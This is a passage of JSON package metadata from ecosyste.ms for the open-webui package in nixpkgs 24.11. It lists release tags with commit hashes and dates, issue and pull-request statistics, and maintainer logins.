bui/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4900ac5136579c44c1be63f9b093fe8aff199910","kind":"commit","published_at":"2024-06-30T03:26:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"b0724811dfdb70883c112c20e05dda46707e0330","kind":"commit","published_at":"2024-06-27T20:38:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"9e4dd4b86f77653b59dc1fa97fe3f72e8252b359","kind":"commit","published_at":"2024-06-17T05:52:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"8f3c9b391be312c72c1a621135fd3cbe33fc0d15","kind":"commit","published_at":"2024-06-12T18:21:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"c41b33c9c0722c84055a833802611f8ee39609d3","kind":"commit","published_at":"2024-06-12T09:14:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"3933db2c91e635da52a28a9e7e2927f551b2fee6","kind":"commit","published_at":"2024-06-10T20:53:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"75d455ac8fc64f741607613c2277a02e28228a3c","kind":"commit","published_at":"2024-06-10T02:09:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"96a004d4d8289db1dea83a322f26ab01be3db3fc","kind":"commit","published_at":"2024-06-10T01:11:53.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0/manifests"},{"name":"v0.2.5","sha":"dbb83f9824154480908e77fa4562d9fbe73a5de4","kind":"commit","published_at":"2024-06-05T17:06:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"f28877f4db2a136f26c495e033f1d2b4ea1b405c","kind":"commit","published_at":"2024-06-04T04:29:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"14646e84ea5e9d85fbb27a557ca14fb241cc373b","kind":"commit","published_at":"2024-06-03T20:06:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"5be97b81d61c571eb6758bf7b3d2ee85a09d2d02","kind":"commit","published_at":"2024-06-03T01:27:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"cfc78dedf0024ecb97a5090825af2698524c9d71","kind":"commit","published_at":"2024-06-02T21:08:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"72354e06a759075024d6be6bc6a8e717ec29d823","kind":"commit","published_at":"2024-06-02T05:03:02.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0/manifests"},{"name":"v0.1.125","sha":"be5534c655f6cb3cc54c079de3f19d671e7a172b","kind":"commit","published_at":"2024-05-19T20:16:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.125","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.125","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.125","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125/manifests"},{"name":"v0.1.124","sha":"b8d7fdf16e57deaf7faaa4dad7c2c5666e8b18ed","kind":"commit","published_at":"2024-05-08T17:54:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.124","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.124","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.124","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124/manifests"},{"name":"v0.1.123","sha":"38ff3209ad2a57d8adb61cd597a7a5f55737ab25","kind":"commit","published_at":"2024-05-02T20:10:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.123","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.123","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.123","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123/manifests"},{"name":"v0.1.122","sha":"92c98eda2e7340bc7c8f32d33bc49cec8498b1bb","kind":"commit","published_at":"2024-04-28T01:29:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.122","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.122","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.122","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122/manifests"},{"name":"v0.1.121","sha":"748cb7d4460d38e73bb94260d2f78a98f56b7bf4","kind":"commit","published_at":"2024-04-24T19:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.121","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.121","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.121","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121/manifests"},{"name":"v0.1.120","sha":"22c50f62cbbe9445bc8ea00695310ed740ad3789","kind":"commit","published_at":"2024-04-21T00:41:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.120","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.120","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.120","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120/manifests"},{"name":"v0.1.119","sha":"851754700a4d4c90602c57564076521940d88fca","kind":"commit","published_at":"2024-04-16T22:12:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.119","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.119","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.119","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119/manifests"},{"name":"v0.1.118","sha":"0399a69b73de9789c4221acedea70d528e1346c4","kind":"commit","published_at":"2024-04-10T22:41:12.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.118","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.118","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.118","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118/manifests"},{"name":"v0.1.117","sha":"46774aa5cdbf4e894776978be60311210a6d0b32","kind":"commit","published_at":"2024-04-04T04:43:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.117","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.117","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.117","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117/manifests"},{"name":"v0.1.116","sha":"3b0cb7945f5c9dbe55d5f76720ddf4e475c11169","kind":"commit","published_at":"2024-03-31T08:17:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.116","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.116","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.116","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116/manifests"},{"name":"v0.1.115","sha":"ac294a74e7bc5f080970c049c656506e36f9407b","kind":"commit","published_at":"2024-03-24T23:20:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.115","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.115","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.115","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115/manifests"},{"name":"v0.1.114","sha":"2fa94956f4e500bf5c42263124c758d8613ee05e","kind":"commit","published_at":"2024-03-21T02:34:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.114","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.114","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.114","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114/manifests"},{"name":"v0.1.113","sha":"621719c6ac504e1c217fda3e445375a1d20802a3","kind":"commit","published_at":"2024-03-18T18:02:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.113","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.113","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.113","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113/manifests"},{"name":"v0.1.112","sha":"5ce421e7faf79f8d7a28fd7cebe6fdc445c4146e","kind":"commit","published_at":"2024-03-15T20:49:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.112","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.112","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.112","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112/manifests"},{"name":"v0.1.111","sha":"89634046e721c972eb24bd5115bd9eff77513d7a","kind":"commit","published_at":"2024-03-10T22:00:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.111","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.111","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.111","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111/manifests"},{"name":"v0.1.110","sha":"8ed5759d0e9424f87d01fe3f8013116c4ba2004f","kind":"commit","published_at":"2024-03-07T04:32:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.110","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.110","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.110","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110/manifests"},{"name":"v0.1.109","sha":"92e21acb4cfa8fb91c56df2903d7fc33448f7aae","kind":"commit","published_at":"2024-03-06T20:40:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.109","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.109","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.109","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109/manifests"},{"name":"v0.1.108","sha":"eb51ad14e4caafda1c9fd24c4945044b8776a7a3","kind":"commit","published_at":"2024-03-03T03:25:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.108","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.108","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.108","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108/manifests"},{"name":"v0.1.107","sha":"6c70d0f770ce4b0acf8d2a33eb7c0f27ffbed631","kind":"commit","published_at":"2024-03-02T07:05:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.107","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.107","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.107","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107/manifests"},{"name":"v0.1.106","sha":"a181b2b63ba4f263e1683b087194e2f431960525","kind":"commit","published_at":"2024-02-28T04:11:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.106","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.106","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.106","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106/manifests"},{"name":"v0.1.105","sha":"6df2505bf0352a7580b33f17ce6844afe04fb7be","kind":"commit","published_at":"2024-02-26T05:53:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.105","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.105","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.105","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105/manifests"},{"name":"v0.1.104","sha":"3c10c3b928097035655e913eaf0e5dfc900f0f25","kind":"commit","published_at":"2024-02-25T21:05:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.104","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104/manifests"},{"name":"v0.1.103","sha":"02fb517bbe0e40bf8a10df88d9c021f69ffe9ce3","kind":"commit","published_at":"2024-02-25T19:01:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.103","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103/manifests"},{"name":"v0.1.102","sha":"4a47833f838088a0309edad2f85ff247b2ad6e00","kind":"commit","published_at":"2024-02-23T03:34:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.102","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102/manifests"}]},"repo_metadata_updated_at":"2026-08-22T23:24:07.810Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/open-webui?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/open-webui","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/open-webui","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/open-webui/dependencies","status":null,"funding_links":["https://github.com/sponsors/open-webui"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T22:02:18.537Z","issues_count":5534,"pull_requests_count":5052,"avg_time_to_close_issue":778857.2304849884,"avg_time_to_close_pull_request":412387.06346525095,"issues_closed_count":2165,"pull_requests_closed_count":4144,"pull_request_authors_count":1356,"issue_authors_count":3588,"avg_comments_per_issue":0.9989157932779184,"avg_comments_per_pull_request":1.1668646080760094,"merged_pull_requests_count":2388,"bot_issues_count":2,"bot_pull_requests_count":306,"past_year_issues_count":429,"past_year_pull_requests_count":524,"past_year_avg_time_to_close_issue":670686.1807909604,"past_year_avg_time_to_close_pull_request":1495749.093939394,"past_year_issues_closed_count":177,"past_year_pull_requests_closed_count":330,"past_year_pull_request_authors_count":189,"past_year_issue_authors_count":329,"past_year_avg_comments_per_issue":2.2750582750582753,"past_year_avg_comments_per_pull_request":1.284351145038168,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":26,"past_year_merged_pull_requests_count":91,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/issues","maintainers":[{"login":"silentoplayz","count":182,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"Classic298","count":97,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"dannyl1u","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dannyl1u"},{"login":"Silentoplayz","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Silentoplayz"},{"login":"justinh-rahb","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinh-rahb"},{"login":"ayanahye","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ayanahye"},{"login":"jackthgu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jackthgu"},{"login":"andrewbbaek","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"},{"login":"bdsumon4u","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bdsumon4u"},{"login":"matgla","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matgla"},{"login":"byg1004","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byg1004"},{"login":"GryBsh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GryBsh"},{"login":"pagoru","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pagoru"},{"login":"mohswell","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mohswell"},{"login":"MickWang","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MickWang"}],"active_maintainers":[{"login":"Classic298","count":97,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"silentoplayz","count":67,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"andrewbbaek","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/open-webui/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/open-webui/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/open-webui/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/open-webui/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/open-webui/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/open-webui/codemeta","maintainers":[{"uuid":"shivaraj-bh","login":null,"name":"Shivaraj B 